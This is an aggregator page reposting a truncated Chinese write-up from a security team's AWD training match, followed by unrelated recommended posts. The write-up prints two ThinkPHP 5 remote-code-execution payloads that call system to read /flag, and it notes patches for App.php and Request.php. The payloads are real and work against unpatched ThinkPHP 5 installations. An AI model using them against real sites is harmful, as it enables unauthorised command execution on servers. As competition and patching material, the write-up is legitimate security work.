注册
登录
看啥推荐读物
专栏名称:
星盟安全
星盟安全工作室---“VENI VIDI VICI”(我来,我见,我征服),我们的征途是星辰大海。从事各类安全研究,专注于知识分享。
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
微信公众号RSS订阅方法
B站投稿RSS订阅方法
知乎回答RSS订阅方法
知乎专栏 RSS订阅方法
雪球动态RSS订阅方法
微博RSS订阅方法
微博搜索关键词订阅方法
豆瓣日记 RSS订阅方法
目录
相关文章推荐
财宝宝
·
菜菜大哥,我之前炒币失败,负债三百多个。我上 ...
·
3 天前
财宝宝
·
泼妇面条,小区门口半成品买的。 ...
·
3 天前
财宝宝
·
做不做?差距是200%-1000%。怎么做? ...
·
4 天前
财宝宝
·
纺租的收益率大概是1%。 ...
·
5 天前
财宝宝
·
鱼和熊掌不可兼得 ...
·
6 天前
今天看啥
›
专栏
›
星盟安全
星盟安全团队AWD训练赛
星盟安全
·
公众号
· · 2020-03-18 11:10
web1这个题目我一共找到了四个漏洞。Thinkphp5rce1?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag这个可以直接打,修复方案如下在App.php的第375行加入一个正则的过滤,即可修复,这个是官方的方法,因为thinkphp我比较熟悉所以就直接按照官方的方法修复了。thinkphp5rce2s=cat /flag&_method=__construct&method=&filter[]=system这个是通过post方法进行传值,没有找到官方的修复方案,但事实上上面那个修了以后这个也就修掉了,为了保险起见我还是做了个双保险。在Request.php里面粗暴的修复了一下反序列化1链子还是很简单的,甚至没有链子,直接可以利用,就在入口文件index.php中然后这里简单的反序列化点在Index.php中修复方案,我是直接加了个正则进 ………………………………
原文地址:
访问原文地址
快照地址:
访问文章快照
分享到微博
推荐文章
财宝宝
·
菜菜大哥,我之前炒币失败,负债三百多个。我上一个工作是搞数据开发-20240524205931
3 天前
财宝宝
·
泼妇面条,小区门口半成品买的。 -20240524110525
3 天前
财宝宝
·
做不做?差距是200%-1000%。怎么做?差距是20%-50%-20240523194527
4 天前
财宝宝
·
纺租的收益率大概是1%。 假设老王有一个忆,他每年-20240522095544
5 天前
财宝宝
·
鱼和熊掌不可兼得 我想象中的好日子:现在的生活保持不-20240521200802
6 天前
公考齐麟
·
【举一反三】042—“秒杀”——同组概率
2 月前
华杉2009
·
转发微博-20230915082354
8 月前
券商中国
·
效仿欧元区?!西非15国官宣,将发行统一货币,2027年正式启用,影响几何?
2 年前
WEEX一起交易
·
8队长交易笔记 | 炎炎夏日也成了猪肉涨价的理由?
4 年前
中国日报双语新闻
·
武大靖,征服世界的男子!外媒:表现堪称完美!丨外媒说
6 年前